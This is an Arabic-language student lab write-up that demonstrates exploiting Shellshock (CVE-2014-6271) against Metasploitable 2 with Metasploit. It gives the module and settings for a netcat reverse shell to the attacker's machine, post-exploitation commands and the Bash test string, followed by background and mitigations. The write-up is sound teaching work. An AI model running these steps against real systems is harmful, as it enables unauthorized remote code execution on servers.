
مختبر تعليمي يوضح استغلال ثغرة Shellshock (CVE-2014-6271) باستخدام Metasploit ضد Metasploitable 2، بما في ذلك الفحص والاستغلال والصدفة العكسية واستراتيجيات التخفيف.
هذا هو التكليف العملي لمادة تقييم الثغرات واختبار الاختراق – الجزء الثاني، مع التركيز على استغلال وتحليل ثغرة شيلشوك (CVE-2014-6271).
تم إجراؤه في بيئة معملية خاضعة للرقابة باستخدام Metasploitable 2 (الهدف) و Kali Linux (المهاجم).
nmap -sS -sV <target-ip>
2️⃣ بدء Metasploit
msfconsole
3️⃣ تحميل وحدة الاستغلال
use exploit/multi/http/apache_mod_cgi_bash_env_exec
4️⃣ تكوين الاستغلال
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
5️⃣ تشغيل الاستغلال
exploit
📸 العرض التوضيحي يشمل
📡 نتائج مسح Nmap
⚙️ تكوين Metasploit
🔄 مخرجات جلسة الصدفة العكسية
🛠 أوامر ما بعد الاستغلال:
whoami
uname -a
ifconfig
📖 الخلفية النظرية ما هو شيلشوك؟
شيلشوك هي ثغرة في صدفة GNU Bash تسمح للمهاجمين بتنفيذ أوامر تعسفية عن طريق حقنها في متغيرات البيئة. تم اكتشافها في سبتمبر 2014 وأُسند إليها CVE-2014-6271، وهي تؤثر على Bash من الإصدار 1.14 إلى 4.3. كيف تعمل
تقوم Bash بمعالجة تعريفات الدوال في متغيرات البيئة بشكل غير صحيح وتنفيذ أوامر إضافية بعد نص الدالة. في خوادم الويب التي تستخدم نصوص CGI، تصبح رؤوس HTTP متغيرات بيئة، مما يخلق مسار هجوم سهل.
مثال:
env x='() { :;}; echo vulnerable' bash -c "echo test"
إذا كانت ضعيفة، فإنها تطبع vulnerable. التأثير
تنفيذ كود عن بُعد كامل (RCE) دون مصادقة
قابلة للاستغلال عبر طلبات HTTP بسيطة
مُستخدمة في شبكات الروبوتات (botnets)، الديدان، الهجمات المستهدفة
أثرت على ملايين الخوادم، أجهزة التوجيه، وأجهزة إنترنت الأشياء
استغلالات في العالم الحقيقي
خوادم Yahoo – برمجيات خبيثة عبر نصوص CGI
شبكة الروبوتات Wopbot – استغلال آلي
QNAP NAS – وصول صدفة عن بُعد وبرمجيات خبيثة
ديدان ذاتية التكاثر – الانتشار إلى مضيفين جدد ضعفاء
🛡 الوقاية والتخفيف
🔄 تحديث Bash فورًا
🚫 تعطيل نصوص CGI غير المستخدمة
🔥 استخدام جدران الحماية لحظر حركة المرور غير الضرورية
🛡 نشر جدران حماية تطبيقات الويب (WAF)
📜 مراقبة سجلات طلبات HTTP
👤 تطبيق مبادئ الامتياز الأقل
⚠️ إخلاء مسؤولية
هذا المشروع لأغراض تعليمية فقط. تم إجراء جميع الاختبارات في بيئة معملية خاضعة للرقابة. ❌ لا تستخدم هذه التقنيات على أنظمة دون إذن.
👨💻 المؤلف: Janith Madhusankha 🎓 الدورة: BICT (Hons) في الشبكات والأمن 🏫 المؤسسة: South Eastern University of Sri Lanka